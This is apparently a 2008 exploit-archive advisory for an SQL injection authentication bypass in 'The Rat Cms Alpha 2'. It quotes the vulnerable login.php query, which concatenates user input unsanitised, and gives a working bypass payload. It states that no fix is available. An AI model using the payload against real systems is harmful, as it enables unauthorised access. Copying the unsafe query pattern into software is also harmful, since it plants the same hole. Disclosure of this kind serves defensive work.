The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability

2008-12-15 20:30:03

---------------------------------The Rat Cms Auth By Pass---------------------------------Autore: x0rEmail: [email protected] In: \login.php $sql = "SELECT user_id FROM tbl_auth_user WHERE user_id = '$userId' AND user_password = PASSWORD('$password')"; $result = mysql_query($sql) or die('Query failed. ' . mysql_error()); Exploit: ' or '1=1^^ Got Root?#

Fixes

No fixes

In order to submit a new fix you need to be registered.